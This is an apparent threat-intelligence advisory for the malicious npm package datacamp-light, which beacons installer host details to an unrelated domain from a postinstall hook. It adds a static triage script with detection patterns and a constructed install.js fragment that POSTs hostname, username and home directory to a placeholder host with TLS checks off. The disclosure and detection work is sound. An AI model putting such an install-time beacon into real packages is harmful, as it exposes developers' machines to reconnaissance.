Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in datacamp-light (npm)

datacamp-light

Risk score

92

AI summary

Indexed incident for datacamp-light (npm).

Description

The package impersonates the DataCamp brand while shipping near-empty stub exports (the init and helper functions in index.js return trivial constants). The postinstall lifecycle hook (node install.js) runs on every npm install and collects the installer's hostname, OS username, home directory, platform, current working directory, and a timestamp, then POSTs them over HTTPS to dc.iam.c.noratomo.asia/install with TLS certificate verification disabled (rejectUnauthorized: false). The destination domain has no relationship to datacamp.com. Together, the brand-impersonating name, hollow library functionality, lifecycle-triggered outbound beacon to an unrelated domain, host-identifying fields, and disabled TLS verification mark this as a supply-chain reconnaissance implant aimed at developers who install the package expecting DataCamp tooling.
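
A static triage check for the signals listed above, as an added example that is not part of the advisory or the package. The function names, verdict strings and sample inputs (a constructed fragment with a placeholder host) are assumptions.

```javascript
// Added example (not from the advisory): static triage of an unpacked npm
// package for the install-time signals described above. Nothing is executed.
const HOOKS = ['preinstall', 'install', 'postinstall'];
const SIGNALS = {
  hostIdentity: /\bos\.(hostname|userInfo|homedir|platform)\s*\(/g,
  outboundRequest: /\bhttps?\.(request|get)\s*\(/g,
  tlsVerifyDisabled: /rejectUnauthorized\s*:\s*false/g,
};

// Lifecycle hooks npm runs automatically, with the JS file each one launches.
function installHooks(pkg) {
  const scripts = pkg.scripts || {};
  return HOOKS.filter((h) => typeof scripts[h] === 'string').map((h) => {
    const m = /\bnode\s+(\S+\.js)\b/.exec(scripts[h]);
    return { hook: h, command: scripts[h], file: m ? m[1] : null };
  });
}

// files: map of path -> source text read from the tarball (hypothetical shape).
function triage(pkg, files) {
  const findings = [];
  for (const { hook, file } of installHooks(pkg)) {
    const src = file && files[file];
    if (!src) continue;
    for (const [signal, re] of Object.entries(SIGNALS)) {
      const hits = src.match(re) || [];
      if (hits.length) findings.push({ hook, file, signal, hits: hits.length });
    }
  }
  // An install hook that both talks to the network and either fingerprints the
  // host or disables TLS verification is the pattern this advisory describes.
  const seen = new Set(findings.map((f) => f.signal));
  const beacon = seen.has('outboundRequest') &&
    (seen.has('hostIdentity') || seen.has('tlsVerifyDisabled'));
  return { findings, verdict: beacon ? 'block-and-review' : 'no-install-time-beacon' };
}

// Constructed sample inputs (fragments, placeholder host), not the real package.
const samplePkg = { name: 'example-pkg', version: '1.0.0',
  scripts: { postinstall: 'node install.js' } };
const sampleFiles = { 'install.js': [
  "const os = require('os'), https = require('https');",
  'const info = { h: os.hostname(), u: os.userInfo().username, d: os.homedir() };',
  "const req = https.request({ hostname: 'collector.example.invalid', path: '/install',",
  "  method: 'POST', rejectUnauthorized: false });",
].join('\n') };

console.log(JSON.stringify(triage(samplePkg, sampleFiles), null, 2));
```

Feed it files read from a tarball fetched with npm pack, which downloads the package without running its lifecycle scripts.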

Technical details

Affected versions

=1.0.0

Indicators

  • affected version=1.0.0 · 75%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
